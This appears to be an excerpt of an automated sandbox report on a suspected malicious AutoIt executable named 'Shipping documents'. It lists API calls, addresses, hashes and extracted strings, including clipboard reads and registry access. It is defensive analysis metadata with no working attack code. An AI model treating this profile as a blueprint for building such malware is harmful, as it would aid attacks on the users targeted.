                                                                                                          • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                          • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
• GetStockObject.GDI32(00000011), ref: 004593D3
• SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• SetCursor.USER32(00000000), ref: 00430773
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
• SetCursor.USER32(00000000), ref: 0043078B
• LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
• SetCursor.USER32(00000000), ref: 004307A3
• LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
• SetCursor.USER32(00000000), ref: 004307BB
• LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
• SetCursor.USER32(00000000), ref: 004307D3
• LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
• SetCursor.USER32(00000000), ref: 004307EB
• LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
• SetCursor.USER32(00000000), ref: 00430803
• LoadCursorW.USER32(00000000,00007F85), ref: 00430814
• SetCursor.USER32(00000000), ref: 0043081B
• LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
• SetCursor.USER32(00000000), ref: 00430833
• LoadCursorW.USER32(00000000,00007F84), ref: 00430844
• SetCursor.USER32(00000000), ref: 0043084B
• LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
• SetCursor.USER32(00000000), ref: 00430863
• LoadCursorW.USER32(00000000,00007F02), ref: 00430874
• SetCursor.USER32(00000000), ref: 0043087B
• SetCursor.USER32(00000000), ref: 00430887
• LoadCursorW.USER32(00000000,00007F00), ref: 00430898
• SetCursor.USER32(00000000), ref: 0043089F
Similarity
• API ID: Cursor$Load
• String ID:
• API String ID: 1675784387-0
APIs
• GetSysColor.USER32(0000000E), ref: 00430913
• SetTextColor.GDI32(?,00000000), ref: 0043091B
• GetSysColor.USER32(00000012), ref: 00430933
• SetTextColor.GDI32(?,?), ref: 0043093B
• GetSysColorBrush.USER32(0000000F), ref: 0043094E
• GetSysColor.USER32(0000000F), ref: 00430959
• CreateSolidBrush.GDI32(?), ref: 00430962
• GetSysColor.USER32(00000011), ref: 00430979
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
• SelectObject.GDI32(?,00000000), ref: 0043099C
• SetBkColor.GDI32(?,?), ref: 004309A6
• SelectObject.GDI32(?,?), ref: 004309B4
• InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
• GetWindowLongW.USER32(?,000000F0), ref: 00430A09
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
• GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
• InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
• DrawFocusRect.USER32(?,?), ref: 00430A91
• GetSysColor.USER32(00000011), ref: 00430A9F
• SetTextColor.GDI32(?,00000000), ref: 00430AA7
• DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
• SelectObject.GDI32(?,?), ref: 00430AD0
• DeleteObject.GDI32(00000105), ref: 00430ADC
• SelectObject.GDI32(?,?), ref: 00430AE3
• DeleteObject.GDI32(?), ref: 00430AE9
• SetTextColor.GDI32(?,?), ref: 00430AF0
• SetBkColor.GDI32(?,?), ref: 00430AFB
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1582027408-0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
Strings
Similarity
• API ID: CloseConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 3217815495-966354055
APIs
• GetCursorPos.USER32(?), ref: 004566AE
• GetDesktopWindow.USER32 ref: 004566C3
• GetWindowRect.USER32(00000000), ref: 004566CA
• GetWindowLongW.USER32(?,000000F0), ref: 00456722
• GetWindowLongW.USER32(?,000000F0), ref: 00456735
• DestroyWindow.USER32(?), ref: 00456746
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
• SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
• SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
• IsWindowVisible.USER32(?), ref: 0045682C
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
• GetWindowRect.USER32(?,?), ref: 00456873
• MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
• GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
• CopyRect.USER32(?,?), ref: 004568BE
• SendMessageW.USER32(?,00000412,00000000), ref: 00456914
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 225202481-3320066284
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Strings
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
APIs
Strings
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
APIs
Strings
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 1744303182-0
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                          • API String ID: 4163708885-3819984048
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                          • API String ID: 0-1896584978
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2485277191-404129466
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3869813825-0
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                                                          • String ID: D
                                                                                                          • API String ID: 1914653954-2746444292
APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• __wsplitpath.LIBCMT ref: 0045CE78
• _wcscat.LIBCMT ref: 0045CE8B
• _wcscat.LIBCMT ref: 0045CE9E
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• _wcscpy.LIBCMT ref: 0045CF61
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
• Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
APIs
Strings
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
• Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
• GetFocus.USER32 ref: 0046A0DD
• GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
Strings
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
• Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
• Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
• Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
APIs
• DestroyWindow.USER32(?), ref: 004558E3
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
Strings
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
• Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
• DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
• DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
• GetMenuItemCount.USER32 ref: 00468CFD
• SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
• GetCursorPos.USER32(?), ref: 00468D3F
• SetForegroundWindow.USER32(?), ref: 00468D49
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
Strings
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Strings
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 3631882475-2268648507
• Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
• Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
